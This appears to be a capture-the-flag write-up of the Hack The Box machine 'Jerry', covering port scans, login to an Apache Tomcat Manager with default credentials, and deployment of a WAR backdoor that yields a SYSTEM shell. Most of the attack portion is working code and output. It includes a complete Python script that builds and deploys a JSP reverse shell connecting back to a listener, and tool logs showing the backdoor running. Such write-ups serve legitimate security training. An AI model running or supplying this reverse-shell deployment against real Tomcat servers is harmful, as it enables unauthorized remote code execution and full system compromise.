Jerry
Port scan
root@kali:~/HTB/Machines/Jerry# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.95 --rate=1000

Starting masscan 1.0.5 at 2019-12-03 18:08:03 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 8080/tcp on 10.10.10.95
Nmap
root@kali:~/HTB/Machines/Jerry# nmap -sC -sV 10.10.10.95
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-03 13:09 EST
Nmap scan report for jerry.htb (10.10.10.95)
Host is up (0.043s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.85 seconds
Web browsing
The only open port is an Apache Tomcat 7.0.88 installation, so the Manager application at /manager/html is the first thing to try.
Without a valid Manager login, Tomcat bounces us with a 403 error page which, helpfully, explains how to set up users and roles in tomcat-users.xml and quotes an example user (tomcat, password s3cret).
Those example credentials work as-is on this box and we land in the Manager.
tomcatWarDeployer
Anyone who can deploy applications through the Manager gets code execution as the Tomcat service account. We could build our own WAR file containing a reverse-shell JSP and upload it by hand, but Mariusz B. (mgeeky) has already automated the whole deploy-and-connect cycle with tomcatWarDeployer.
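The same thing done by hand, as an added example that is not part of this writeup and is not tomcatWarDeployer's code: build_war() packs a reverse-shell JSP into a minimal WAR, deploy() PUTs it through the Tomcat Manager text interface with HTTP Basic auth, and undeploy() removes it again for clean-up (the equivalent of the tool's -R). It uses only the Python standard library. The target, listener address and credentials are the ones from this page; the context path /jsp_app mirrors the tool's default. One assumption to check: the /manager/text/ interface requires the manager-script role, whereas the HTML interface the tool drives only needs manager-gui, so if deploy() comes back with a 403 the upload has to go through the /manager/html form instead.

```python
#!/usr/bin/env python3
"""Hand-rolled Tomcat WAR deployer (added example, not the writeup's or the tool's code).

Builds a WAR carrying a JSP reverse shell and pushes it through the Manager text
interface. Assumes the Manager user holds the manager-script role.
"""
import base64
import io
import urllib.parse
import urllib.request
import zipfile

# Minimal deployment descriptor. Tomcat compiles index.jsp on first request and
# serves it as the welcome file; nothing else is needed in the archive.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
  <welcome-file-list><welcome-file>index.jsp</welcome-file></welcome-file-list>
</web-app>
"""

# JSP reverse shell: connects back to __LHOST__:__LPORT__ and pumps bytes between
# the socket and a cmd.exe child. It runs as the Tomcat service account, which on
# this box is NT AUTHORITY\SYSTEM. The request blocks for as long as the shell lives.
JSP_TEMPLATE = r"""<%@ page import="java.io.*,java.net.*" %><%
Socket s = new Socket("__LHOST__", __LPORT__);
Process p = new ProcessBuilder("cmd.exe").redirectErrorStream(true).start();
InputStream pi = p.getInputStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (si.available() > 0) po.write(si.read());
    so.flush(); po.flush();
    try { Thread.sleep(50); } catch (InterruptedException e) {}
    try { p.exitValue(); break; } catch (IllegalThreadStateException e) {}
}
p.destroy(); s.close();
%>"""


def build_war(lhost: str, lport: int) -> bytes:
    """Return the WAR (a plain zip) as bytes: WEB-INF/web.xml plus the shell JSP."""
    jsp = JSP_TEMPLATE.replace("__LHOST__", lhost).replace("__LPORT__", str(lport))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("WEB-INF/web.xml", WEB_XML)
        z.writestr("index.jsp", jsp)
    return buf.getvalue()


def war_entries(war: bytes) -> dict:
    """Map of archive member name -> content, handy for checking what was built."""
    with zipfile.ZipFile(io.BytesIO(war)) as z:
        return {name: z.read(name) for name in z.namelist()}


def manager_url(base: str, command: str, app_path: str) -> str:
    """Manager text-interface URL, e.g. .../manager/text/deploy?path=%2Fjsp_app&update=true."""
    query = {"path": app_path}
    if command == "deploy":
        query["update"] = "true"  # overwrite if a stale copy is still deployed
    return f"{base.rstrip('/')}/manager/text/{command}?{urllib.parse.urlencode(query)}"


def _request(url: str, user: str, password: str, data=None, method: str = "GET") -> str:
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req = urllib.request.Request(url, data=data, method=method)
    req.add_header("Authorization", f"Basic {token}")
    if data is not None:
        req.add_header("Content-Type", "application/octet-stream")
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode(errors="replace")


def deploy(base: str, user: str, password: str, app_path: str, war: bytes) -> str:
    """PUT the WAR body. Tomcat answers 'OK - Deployed application at context path ...' or 'FAIL - ...'."""
    return _request(manager_url(base, "deploy", app_path), user, password, data=war, method="PUT")


def undeploy(base: str, user: str, password: str, app_path: str) -> str:
    """Remove the application again so the backdoor does not outlive the engagement."""
    return _request(manager_url(base, "undeploy", app_path), user, password)


if __name__ == "__main__":
    base, user, pw = "http://10.10.10.95:8080", "tomcat", "s3cret"
    war = build_war("10.10.14.34", 4444)
    print(deploy(base, user, pw, "/jsp_app", war).strip())
    # Have a listener up first (nc -lvnp 4444). This GET only returns once the shell exits.
    try:
        _request(f"{base}/jsp_app/", user, pw)
    except Exception as exc:  # a client-side timeout is normal while the shell is alive
        print("trigger request ended:", exc)
    print(undeploy(base, user, pw, "/jsp_app").strip())
```

Run the listener before the trigger request; the JSP connects back as soon as it is compiled and executed, and the HTTP request to /jsp_app/ stays open for the lifetime of the shell, so a client-side timeout on that request is expected and harmless.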
Install the utility
root@kali:~/HTB/Utils# git clone https://github.com/mgeeky/tomcatWarDeployer.git
Cloning into 'tomcatWarDeployer'...
remote: Enumerating objects: 269, done.
remote: Total 269 (delta 0), reused 0 (delta 0), pack-reused 269
Receiving objects: 100% (269/269), 193.51 KiB | 1.50 MiB/s, done.
Resolving deltas: 100% (148/148), done.
Create the reverse shell
-U/-P are the Manager credentials, -H/-p the address and port our listener will accept the reverse shell on, -u the Manager path on the target and -v verbose output:
root@kali:~/HTB/Machines/Jerry# python ../../Utils/tomcatWarDeployer/tomcatWarDeployer.py 10.10.10.95:8080 -U tomcat -P s3cret -H 10.10.14.34 -p 4444 -v -u /manager/html
tomcatWarDeployer (v. 0.5.2) Apache Tomcat auto WAR deployment & launching tool Mariusz B. / MGeeky '16-18
Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.
INFO: Reverse shell will connect to: 10.10.14.34:4444.
DEBUG: Trying Creds: ["tomcat:s3cret"]: Browsing to "http://10.10.10.95:8080/manager/html"...
DEBUG: Trying to fetch: "http://10.10.10.95:8080/manager/html/"
DEBUG: Probably found something: Apache Tomcat/7.0.88
INFO: Apache Tomcat/7.0.88 Manager Application reached & validated.
INFO: At: "http://10.10.10.95:8080/manager/html/"
DEBUG: Generating JSP WAR backdoor code...
DEBUG: Preparing additional code for Reverse TCP shell
DEBUG: Generating temporary structure for jsp_app WAR at: "/tmp/tmp_sTDOH"
DEBUG: Working with Java at version: 11.0.5
DEBUG: Generating web.xml with servlet-name: "JSP Application"
DEBUG: Generating WAR file at: "/tmp/jsp_app.war"
DEBUG: added manifest
adding: files/(in = 0) (out= 0)(stored 0%)
adding: files/WEB-INF/(in = 0) (out= 0)(stored 0%)
adding: files/WEB-INF/web.xml(in = 505) (out= 254)(deflated 49%)
adding: files/META-INF/(in = 0) (out= 0)(stored 0%)
adding: files/META-INF/MANIFEST.MF(in = 66) (out= 65)(deflated 1%)
adding: index.jsp(in = 4494) (out= 1681)(deflated 62%)
DEBUG: Tree command not available. Skipping.
DEBUG: WAR file structure:
DEBUG:
DEBUG: Checking if app jsp_app is deployed at: http://10.10.10.95:8080/manager/html/
DEBUG: App not deployed.
INFO: It looks that the application with specified name "jsp_app" has not been deployed yet.
DEBUG: Deploying application: jsp_app from file: "/tmp/jsp_app.war"
DEBUG: Removing temporary WAR directory: "/tmp/tmp_sTDOH"
INFO: WAR DEPLOYED! Invoking it...
DEBUG: Spawned shell handling thread. Awaiting for the event...
DEBUG: Awaiting for reverse-shell handler to set-up
DEBUG: Establishing listener for incoming reverse TCP shell at 10.10.14.34:4444
DEBUG: Socket is binded to local port now, awaiting for clients...
DEBUG: Invoking application at url: "http://10.10.10.95:8080/jsp_app/"
DEBUG: Adding 'X-Pass: ijla5qmceoeM' header for shell functionality authentication.
DEBUG: Incoming client: 10.10.10.95:49193
DEBUG: Application invoked correctly.
INFO: ------------------------------------------------------------
INFO: JSP Backdoor up & running on http://10.10.10.95:8080/jsp_app/
INFO: Happy pwning. Here take that password for web shell: 'ijla5qmceoeM'
INFO: ------------------------------------------------------------
INFO: Connected with: nt authority\system@JERRY

C:\apache-tomcat-7.0.88> whoami
nt authority\system
User and root flags
Tomcat runs as SYSTEM here, so there is no privilege escalation step: both flags sit on the Administrator desktop. Note that the C:\apache-tomcat-7.0.88> prompt is printed by the tool and does not follow cd; the prompt echoed by cmd.exe underneath shows the real working directory.
C:\apache-tomcat-7.0.88> cd c:\Users\Administrator\Desktop\

c:\Users\Administrator\Desktop>
C:\apache-tomcat-7.0.88> dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of c:\Users\Administrator\Desktop

06/19/2018  06:09 AM    <DIR>          .
06/19/2018  06:09 AM    <DIR>          ..
06/19/2018  06:09 AM    <DIR>          flags
               0 File(s)              0 bytes
               3 Dir(s)  27,600,785,408 bytes free

c:\Users\Administrator\Desktop>
C:\apache-tomcat-7.0.88> cd flags

c:\Users\Administrator\Desktop\flags>
C:\apache-tomcat-7.0.88> dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of c:\Users\Administrator\Desktop\flags

06/19/2018  06:09 AM    <DIR>          .
06/19/2018  06:09 AM    <DIR>          ..
06/19/2018  06:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)  27,600,785,408 bytes free

C:\apache-tomcat-7.0.88> type "2 for the price of 1.txt"
user.txt
<USER_FLAG>

root.txt
<ROOT_FLAG>
c:\Users\Administrator\Desktop\flags>
C:\apache-tomcat-7.0.88> exit
Remove the WAR
Do not leave the backdoor behind: the same command with -R undeploys jsp_app through the Manager.
root@kali:~/HTB/Machines/Jerry# python ../../Utils/tomcatWarDeployer/tomcatWarDeployer.py 10.10.10.95:8080 -U tomcat -P s3cret -H 10.10.14.34 -p 4444 -R -v -u /manager/html
tomcatWarDeployer (v. 0.5.2) Apache Tomcat auto WAR deployment & launching tool Mariusz B. / MGeeky '16-18
Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.
INFO: Reverse shell will connect to: 10.10.14.34:4444.
WARNING: Removing previously deployed package, any further actions will not be undertaken.
DEBUG: Trying Creds: ["tomcat:s3cret"]: Browsing to "http://10.10.10.95:8080/manager/html"...
DEBUG: Trying to fetch: "http://10.10.10.95:8080/manager/html/"
DEBUG: Probably found something: Apache Tomcat/7.0.88
INFO: Apache Tomcat/7.0.88 Manager Application reached & validated.
INFO: At: "http://10.10.10.95:8080/manager/html/"
DEBUG: Checking if app jsp_app is deployed at: http://10.10.10.95:8080/manager/html/
INFO: Removing previously deployed WAR application with name: 'jsp_app'
INFO: Succeeded. Hasta la vista!
Daniel Simao 18:22, 3 December 2019 (EST)